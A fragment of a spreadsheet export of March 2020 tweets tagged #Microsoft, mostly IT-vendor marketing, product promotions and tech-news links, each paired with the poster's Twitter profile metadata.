#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 13:28:31 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Azure and United Imaging, your company can deliver reliable, excellent service across the whole customer experience -- just like @Lay_Bare! https://t.co/60cwhGZX87</t>
  </si>
  <si>
    <t>{'id': 569279471, 'id_str': '569279471', 'name': 'United Interiors', 'screen_name': 'uiinteriors', 'location': 'California', 'description': 'United Interiors specializes in providing furnished environments that work and comprehensive project management.', 'url': 'https://t.co/JyPM13zXJs', 'entities': {'url': {'urls': [{'url': 'https://t.co/JyPM13zXJs', 'expanded_url': 'http://www.uiinteriors.com', 'display_url': 'uiinteriors.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 776, 'friends_count': 2597, 'listed_count': 9, 'created_at': 'Wed May 02 17:37:26 +0000 2012', 'favourites_count': 695, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1813, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B8D432', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/925864340707618816/C_mhPZuC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925864340707618816/C_mhPZuC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/569279471/1509578164', 'profile_link_color': 'B8D432',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</si>
  <si>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With #Microsoft #Azure and United Imaging, your company can deliver reliable, excellent service across the whole customer experience -- just like @Lay_Bare! https://t.co/IrNBQgJxdc</t>
  </si>
  <si>
    <t>{'id': 19094839, 'id_str': '19094839', 'name': 'United Imaging', 'screen_name': 'UnitedImagingCo', 'location': 'National Delivery - Next Day!', 'description': "United Imaging's goal is to always present customers with high quality goods at competitive prices with on time delivery. Itâ€™s All About You!", 'url': 'https://t.co/YbiZRPOx3h', 'entities': {'url': {'urls': [{'url': 'https://t.co/YbiZRPOx3h', 'expanded_url': 'http://www.unitedimaging.com', 'display_url': 'unitedimaging.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 719, 'friends_count': 2519, 'listed_count': 37, 'created_at': 'Sat Jan 17 00:43:22 +0000 2009', 'favourites_count': 345, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5273,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'http://pbs.twimg.com/profile_images/1160441464/UnitedImagingU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1160441464/UnitedImagingU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19094839/1398353978', 'profile_link_color': 'B20000', 'profile_sidebar_border_color': 'B20000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:28:03 +0000 2020</t>
  </si>
  <si>
    <t>Watch this 28-second video to get a 10,000-foot view on how #MSDyn365BC connects businesses, enables smarter decisions, and helps foster growth. #MSDyn365 #Microsoft #Technology #IT https://t.co/ElS4nfQWUB</t>
  </si>
  <si>
    <t>{'id': 19407700, 'id_str': '19407700', 'name': 'Femi Dada', 'screen_name': 'smarthosttech', 'location': 'MD', 'description': 'A Business providing technology solutions to commercial and government companies.', 'url': 'https://t.co/dAQTFRsYnU', 'entities': {'url': {'urls': [{'url': 'https://t.co/dAQTFRsYnU', 'expanded_url': 'http://smarthostdesign.com', 'display_url': 'smarthostdesign.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 234, 'listed_count': 6, 'created_at': 'Fri Jan 23 19:01:07 +0000 2009', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1649,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'http://pbs.twimg.com/profile_images/885892252429680641/TICROdGq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885892252429680641/TICROdGq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19407700/1578180557',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</si>
  <si>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13:27:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Error loading MacroEngine script (file: FacebookPosts.cshtml)</t>
  </si>
  <si>
    <t>Tue Mar 03 13:27:24 +0000 2020</t>
  </si>
  <si>
    <t>Finding parking spots with Custom Vision and IoT https://t.co/qkcLTdDOxR #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 13:27:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft sets #PowerAutomates #RPA pricing, general availability for April 2 #appsmgt https://t.co/HYisa6veki https://t.co/soYYzNSHLR</t>
  </si>
  <si>
    <t>{'id': 3007516593, 'id_str': '3007516593', 'name': 'Jason Lloyd', 'screen_name': 'lloydjason94', 'location': '', 'description': 'SAP Applications Consultant / Graduate at Capgemini UK - Work Twitter - Check out my LinkedIn:', 'url': 'https://t.co/YoOmKM2GYA', 'entities': {'url': {'urls': [{'url': 'https://t.co/YoOmKM2GYA', 'expanded_url': 'http://uk.linkedin.com/in/lloydjason94', 'display_url': 'uk.linkedin.com/in/lloydjason94', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 318, 'friends_count': 503, 'listed_count': 4, 'created_at': 'Sat Jan 31 12:16:44 +0000 2015', 'favourites_count': 720, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 820,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'http://pbs.twimg.com/profile_images/915234036771168256/eONTBzwz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/915234036771168256/eONTBzwz_normal.jpg',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</si>
  <si>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13:26:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Threat Protection can help IT teams and universities connect the dots and maintain a clear view of threats affecting their organization and users. https://t.co/e1h0HhuzJF</t>
  </si>
  <si>
    <t>Tue Mar 03 13:25:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox Wireless Controller - White TF5-00001. 
Order now and Save $21!
Check it out!  https://t.co/rEp902JRWY
#microsoftxbox #xbox #gaming #wirelesscontroller #microsoft #controller #gamer #game #xboxcontroller https://t.co/vXvQJKrZpM</t>
  </si>
  <si>
    <t>{'id': 1200521638577491968, 'id_str': '1200521638577491968', 'name': 'Fyve Warehouse', 'screen_name': 'FyveWarehouse', 'location': 'USA', 'description': 'We source liquidated products from big box retailers &amp; offer the best deals direct from our warehouse on the most popular products on the market.', 'url': 'https://t.co/ZQs1ln0GoS', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZQs1ln0GoS', 'expanded_url': 'http://www.fyvewarehouse.com', 'display_url': 'fyvewarehouse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 116, 'listed_count': 0, 'created_at': 'Fri Nov 29 21:07:30 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200522303064272896/oZCUDUVD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200522303064272896/oZCUDUVD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1200521638577491968/1575061800',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</si>
  <si>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13:23:22 +0000 2020</t>
  </si>
  <si>
    <t>A short #review of #Microsoft #Surface Laptop 3 (13-inch, 2019)
#microsoftsurface 
 https://t.co/PQWSCVb4UW via @Technologynow3</t>
  </si>
  <si>
    <t>{'id': 1221087840790044674, 'id_str': '1221087840790044674', 'name': 'TechnologyNow', 'screen_name': 'TechnologyNow3', 'location': 'New York USA', 'description': 'Technology News, Reviews, How Tos and the best tech picks.\nhttps://t.co/pDgQwf99nB', 'url': 'https://t.co/P2OrRXUavO', 'entities': {'url': {'urls': [{'url': 'https://t.co/P2OrRXUavO', 'expanded_url': 'https://Technologynow.eu', 'display_url': 'Technologynow.eu', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pDgQwf99nB', 'expanded_url': 'https://technologynow.eu', 'display_url': 'technologynow.eu', 'indices': [59, 82]}]}}, 'protected': False, 'followers_count': 166, 'friends_count': 235, 'listed_count': 2, 'created_at': 'Sat Jan 25 15:10:11 +0000 2020', 'favourites_count': 622, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 885, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232308597348077572/44oVXw92_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232308597348077572/44oVXw92_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1221087840790044674/1582622777',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</si>
  <si>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13:22:35 +0000 2020</t>
  </si>
  <si>
    <t>Seriously, this has all of the key #MicrosoftTeams Direct Routing essentials you need to know: https://t.co/Yn5ZbFN7HE - via @EvolveIP 
#microsoft #collaboration #voip #O365 #IT</t>
  </si>
  <si>
    <t>Tue Mar 03 13:22:23 +0000 2020</t>
  </si>
  <si>
    <t>Finding parking spots with Custom Vision and IoT https://t.co/YjrhQ1dPq8 #Azure #Channel9 #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 13:21:23 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/hxrK9a9ejB
Cast All Videos To CHROMECAST From PC &amp;amp; Tablet On Windows 10 | Best Streaming Video Player for 2020
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd #uhd #ultrahd #casting #no1</t>
  </si>
  <si>
    <t>Tue Mar 03 13:21:21 +0000 2020</t>
  </si>
  <si>
    <t>How to Integrate Microsoft Dynamics AX with CRM? | TechBullion https://t.co/YKJMZjhtvl #microsoft</t>
  </si>
  <si>
    <t>{'id': 963098563, 'id_str': '963098563', 'name': 'Broad Street Network', 'screen_name': 'BroadStNetwork', 'location': 'Toronto', 'description': 'Need a website? We Design It. Build It. Run It. https://t.co/5GWtlMgMWe', 'url': 'https://t.co/vZkKRJ5wYR', 'entities': {'url': {'urls': [{'url': 'https://t.co/vZkKRJ5wYR', 'expanded_url': 'http://broadstreetnetwork.com/', 'display_url': 'broadstreetnetwork.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/5GWtlMgMWe', 'expanded_url': 'http://broadstreetnetwork.com', 'display_url': 'broadstreetnetwork.com', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 1212, 'friends_count': 1582, 'listed_count': 25, 'created_at': 'Wed Nov 21 21:06:58 +0000 2012', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9610,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'http://pbs.twimg.com/profile_images/908385962325094400/nw64f7Ky_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/908385962325094400/nw64f7Ky_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/963098563/1505410941',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</si>
  <si>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13:20:12 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a Data Security Job in Mumbai, visit 
https://t.co/y9qQ3tGLwF
#datasecurity #jobs #mumbai #security #cybersecurity #networking #compliance #india #maharashtra #networksecurity #firewalls #proxy #emailsecurity #cloudsecurity #siem #edr #cisco #microsoft</t>
  </si>
  <si>
    <t>{'id': 1233333199658352641, 'id_str': '1233333199658352641', 'name': 'Security Expert', 'screen_name': 'DataSecurityFW', 'location': '', 'description': 'Connect people and organisations with data security.', 'url': 'https://t.co/85oUPDdwcr', 'entities': {'url': {'urls': [{'url': 'https://t.co/85oUPDdwcr', 'expanded_url': 'https://www.datasecurityfirewall.com', 'display_url': 'datasecurityfirewall.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Fri Feb 28 10:08:52 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1235383204703383553/U4c3Oyug_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235383204703383553/U4c3Oyug_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233333199658352641/1583373391',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</si>
  <si>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13:19:11 +0000 2020</t>
  </si>
  <si>
    <t>Fueling intelligent energy with IoT
https://t.co/VHCYjz6A92 
#energy #iot #innovation #azure #technology #transformation #microsoft #datacenter #issquared #technology https://t.co/kcQ8RE6DOP</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact NJ2 Company Informatica Ltda for help driving your company's digital transformation. https://t.co/wPVgvrMHoT</t>
  </si>
  <si>
    <t>{'id': 53119265, 'id_str': '53119265', 'name': 'NJ2 Company', 'screen_name': 'nj2company', 'location': 'SertÃ£ozinho/SP', 'description': 'Especialista em planejamento estratÃ©gico na Tecnologia da InformaÃ§Ã£o. A sua companhia de soluÃ§Ãµes.', 'url': 'http://t.co/wsOOwtEXAN', 'entities': {'url': {'urls': [{'url': 'http://t.co/wsOOwtEXAN', 'expanded_url': 'http://www.nj2.com.br', 'display_url': 'nj2.com.br', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 107, 'listed_count': 1, 'created_at': 'Thu Jul 02 16:58:32 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1537, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00668B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1386458288/logo-nj2-twitter5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1386458288/logo-nj2-twitter5_normal.jpg', 'profile_link_color': '04635E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '000526', 'profile_text_color': '999999', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:18:14 +0000 2020</t>
  </si>
  <si>
    <t>Business Digital Focus group ready for the afternoon session at Microsoft, this morning was on AI opportunites, this afternoon is on accesablity and technology
#Microsoft #learning #InnovationForEveryone #thisisnorthayrshire #sharing https://t.co/rtkc8huSxW</t>
  </si>
  <si>
    <t>{'id': 1968559712, 'id_str': '1968559712', 'name': 'North Ayrshire Business Team', 'screen_name': 'NAyrshireBiz', 'location': 'North Ayrshire, Scotland', 'description': 'Our team can provide practical advice to help you grow, start-up or invest in North Ayrshire, Scotland. ðŸ“§business@north-ayrshire.gov.uk #ThisIsNorthAyrshire', 'url': 'https://t.co/zhPp57JTQt', 'entities': {'url': {'urls': [{'url': 'https://t.co/zhPp57JTQt', 'expanded_url': 'http://www.thisisnorthayrshire.co.uk', 'display_url': 'thisisnorthayrshire.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1054, 'friends_count': 615, 'listed_count': 20, 'created_at': 'Fri Oct 18 09:49:20 +0000 2013', 'favourites_count': 1523, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2225, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2F5F7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199370354772398081/sjY3cDOB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199370354772398081/sjY3cDOB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1968559712/1580484188', 'profile_link_color': '1EB2E8',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</si>
  <si>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13:18:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Power Automate adds robotic process automation in April https://t.co/K7yNV0YCRD https://t.co/VUnOpUKeVp</t>
  </si>
  <si>
    <t>Tue Mar 03 13:15:23 +0000 2020</t>
  </si>
  <si>
    <t>I'll show him my pussy on a blog 
https://t.co/azhFVmFOUh
#McAllen
 #game #microsoft https://t.co/S4kcrbmx5H</t>
  </si>
  <si>
    <t>{'id': 1233821750019883008, 'id_str': '1233821750019883008', 'name': 'Cindy King', 'screen_name': 'cruniznina', 'location': 'Port Saint Lucie, USA', 'description': 'You know youâ€™re in love when you canâ€™t fall asleep because reality is finally better than your dreams', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Sat Feb 29 18:30:08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'http://pbs.twimg.com/profile_images/1233929777427427332/LoqAKJwv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233929777427427332/LoqAKJwv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233821750019883008/1583023454',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</si>
  <si>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13:14:43 +0000 2020</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact Dyrand Systems for help driving your company's digital transformation. https://t.co/AIsPAvChXN</t>
  </si>
  <si>
    <t>{'id': 95529180, 'id_str': '95529180', 'name': 'Edward Anderson', 'screen_name': 'edwarddanderson', 'location': 'Vancouver', 'description': 'Managing Director at Dyrand Systems (http://t.co/CSmr8rL0); Providing enterprise class IT support for the small and mid sized business.', 'url': 'https://t.co/m1yUdyaizc', 'entities': {'url': {'urls': [{'url': 'https://t.co/m1yUdyaizc', 'expanded_url': 'http://www.dyrand.com', 'display_url': 'dyrand.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'http://t.co/CSmr8rL0', 'expanded_url': 'http://www.dyrand.com', 'display_url': 'dyrand.com', 'indices': [37, 57]}]}}, 'protected': False, 'followers_count': 53, 'friends_count': 30, 'listed_count': 6, 'created_at': 'Tue Dec 08 23:46:35 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 593,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'http://pbs.twimg.com/profile_images/1261751533/Profile_Pic_3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1261751533/Profile_Pic_3_normal.jpg',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</si>
  <si>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13:14:42 +0000 2020</t>
  </si>
  <si>
    <t>Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact Dyrand Systems for help driving your company's digital transformation. https://t.co/JmQVPbeDM3</t>
  </si>
  <si>
    <t>{'id': 5727552, 'id_str': '5727552', 'name': 'Nicholas Drayer', 'screen_name': 'nicholasdrayer', 'location': 'Vancouver, BC, Canada', 'description': 'Managing Director of Dyrand Systems. We provide you a 24/7 IT department. Ask for our CompleteIT product, making your IT expenses OpEx only.', 'url': 'http://t.co/5I2htsLX7H', 'entities': {'url': {'urls': [{'url': 'http://t.co/5I2htsLX7H', 'expanded_url': 'http://www.dyrand.com', 'display_url': 'dyrand.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 69, 'listed_count': 4, 'created_at': 'Thu May 03 00:27:38 +0000 2007', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 590,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'http://pbs.twimg.com/profile_images/546222299553075200/v0aKnNks_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/546222299553075200/v0aKnNks_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/5727552/1419065401',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</si>
  <si>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Think some companies are too old to transform? Not JB Hunt! See how the trucking company is reinventing itself with #Microsoft #Azure. Contact Dyrand Systems for help driving your company's digital transformation. https://t.co/Fzk0isFel3</t>
  </si>
  <si>
    <t>{'id': 68492744, 'id_str': '68492744', 'name': 'Dyrand Systems', 'screen_name': 'Dyrand', 'location': 'Vancouver, BC, Canada', 'description': "We are Metro Vancouver's premier IT Managed Services Provider.", 'url': 'http://t.co/m1yUdyaizc', 'entities': {'url': {'urls': [{'url': 'http://t.co/m1yUdyaizc', 'expanded_url': 'http://www.dyrand.com', 'display_url': 'dyrand.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 30, 'listed_count': 1, 'created_at': 'Mon Aug 24 19:40:00 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 711,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'http://pbs.twimg.com/profile_images/515537141460267008/uc8tKy0v_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/515537141460267008/uc8tKy0v_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/68492744/1518573781',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</si>
  <si>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13:14:32 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/bqAMDY2ROl</t>
  </si>
  <si>
    <t>Tue Mar 03 13:14:10 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft Cloud and #Microsoft365, Gryphon Consulting can help you assess and manage compliance risk, protect sensitive data and respond efficiently to data discovery requests. Subscribe now to stay informed! https://t.co/l4NkeBMAhP</t>
  </si>
  <si>
    <t>{'id': 1447898852, 'id_str': '1447898852', 'name': 'Gryphon Consulting', 'screen_name': 'GryphonInfo', 'location': 'Largo, MD', 'description': 'Gryphon Consulting keeps your business going by ensuring that all your technology is working efficiently throughout your organization.', 'url': 'http://t.co/s5iRuMZfN0', 'entities': {'url': {'urls': [{'url': 'http://t.co/s5iRuMZfN0', 'expanded_url': 'http://gryphon-consulting.com', 'display_url': 'gryphon-consulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 133, 'listed_count': 6, 'created_at': 'Wed May 22 03:51:13 +0000 2013', 'favourites_count': 546, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6034,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'http://pbs.twimg.com/profile_images/3692819878/a437ac8760c63dd5ab86628d518025cc_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3692819878/a437ac8760c63dd5ab86628d518025cc_normal.jpeg',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</si>
  <si>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13:13:16 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/zMdnWEYvqW</t>
  </si>
  <si>
    <t>{'id': 2170425090, 'id_str': '2170425090', 'name': 'Flint Tech Solutions', 'screen_name': 'FlintTech', 'location': 'Pittsburgh, PA', 'description': 'We take care of your IT needs so you can focus on what matters: growth. Serving Steel City since 2013.', 'url': 'http://t.co/QzABUigtmv', 'entities': {'url': {'urls': [{'url': 'http://t.co/QzABUigtmv', 'expanded_url': 'http://www.flinttech.com', 'display_url': 'flinttech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 145, 'friends_count': 542, 'listed_count': 2, 'created_at': 'Sat Nov 02 15:15:17 +0000 2013', 'favourites_count': 64, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1452,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'http://pbs.twimg.com/profile_images/961382606578307073/koOMFJfK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/961382606578307073/koOMFJfK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2170425090/1518047512', 'profile_link_color': 'DD2E44',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</si>
  <si>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13:12:43 +0000 2020</t>
  </si>
  <si>
    <t>@surface Next release, add a slot for the pen into the body of the tablet &amp;amp; a quick way to toggle touchscreen on / off. Thanks. #microsoft #surface #tablet #laptop #bebetter https://t.co/OnUpFiHYhC</t>
  </si>
  <si>
    <t>{'id': 203607229, 'id_str': '203607229', 'name': 'RESS Design', 'screen_name': 'ressdesign', 'location': 'Wherever I Am At The Time', 'description': 'Creative, artist, designer, animator, front-end developer, storyteller, musician, motivator, strategist.', 'url': 'https://t.co/aWSWUFiTL2', 'entities': {'url': {'urls': [{'url': 'https://t.co/aWSWUFiTL2', 'expanded_url': 'http://www.ressdesign.net', 'display_url': 'ressdesign.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 150, 'friends_count': 439, 'listed_count': 61, 'created_at': 'Sat Oct 16 17:26:32 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1736, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E3E3E3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/966503003342671873/2GfS2okb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/966503003342671873/2GfS2okb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/203607229/1536789199',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</si>
  <si>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13:11:00 +0000 2020</t>
  </si>
  <si>
    <t>We're very happy to announce that Scott Hanselman, Partner Program Manager at @Microsoft, will be giving the keynote "The Future of .NET" at #DotNet2020 
@shanselman #DotNetConfSpain #DotNet #DotNetCore #NetCore #Microsoft https://t.co/mGgmo8kspC</t>
  </si>
  <si>
    <t>Tue Mar 03 13:10:02 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen Microsoft Surface Duo could be launching earlier than expected https://t.co/Z8g59tQN0Y #Microsoft #MicrosoftSurface #MicrosoftSurfaceDuo https://t.co/uhGYg4Vf19</t>
  </si>
  <si>
    <t>{'id': 860598558164213760, 'id_str': '860598558164213760', 'name': 'BuyShipUSA', 'screen_name': 'BuyShipUSA', 'location': 'Global', 'description': 'You buy online from the USA. We ship anywhere in the world. Sign up for your free account for your USA ship-to address: https://t.co/osIsp2EVvL', 'url': 'https://t.co/YKfEiiwbhA', 'entities': {'url': {'urls': [{'url': 'https://t.co/YKfEiiwbhA', 'expanded_url': 'http://www.BuyShipUSA.com', 'display_url': 'BuyShipUSA.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/osIsp2EVvL', 'expanded_url': 'https://www.BuyShipUSA.com', 'display_url': 'BuyShipUSA.com', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 7198, 'friends_count': 3044, 'listed_count': 1, 'created_at': 'Fri May 05 20:54:20 +0000 2017', 'favourites_count': 194, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2307, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/889979717331423232/CIH0mGOZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/889979717331423232/CIH0mGOZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/860598558164213760/1523408919',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</si>
  <si>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13:09:32 +0000 2020</t>
  </si>
  <si>
    <t>Share your Power BI report with the world - Publish To Web https://t.co/CPjNuliste #microsoft #powerbi https://t.co/jNzN1C4ymi</t>
  </si>
  <si>
    <t>{'id': 557419678, 'id_str': '557419678', 'name': 'Winston Snyder', 'screen_name': 'dataprose', 'location': 'AZ, US', 'description': 'Loves the Cowboys, SunDevils, Pizza, Excel BI, Power BI, Power Query, SQL', 'url': 'https://t.co/hsyd7l4Z3p', 'entities': {'url': {'urls': [{'url': 'https://t.co/hsyd7l4Z3p', 'expanded_url': 'https://thewindata.com', 'display_url': 'thewindata.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 241, 'friends_count': 489, 'listed_count': 19, 'created_at': 'Thu Apr 19 04:18:01 +0000 2012', 'favourites_count': 82, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 154,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'http://pbs.twimg.com/profile_images/3567128064/683ca75dafad75200bc23e7dec4983aa_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3567128064/683ca75dafad75200bc23e7dec4983aa_normal.jpeg',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</si>
  <si>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13:08:38 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news Ive been committed to open source software for over a decade because it fosters a deep collaboration across th... #business #database #microsoft #kubernetes #encryption https://t.co/jRR1Kc6rTf</t>
  </si>
  <si>
    <t>Tue Mar 03 13:06:30 +0000 2020</t>
  </si>
  <si>
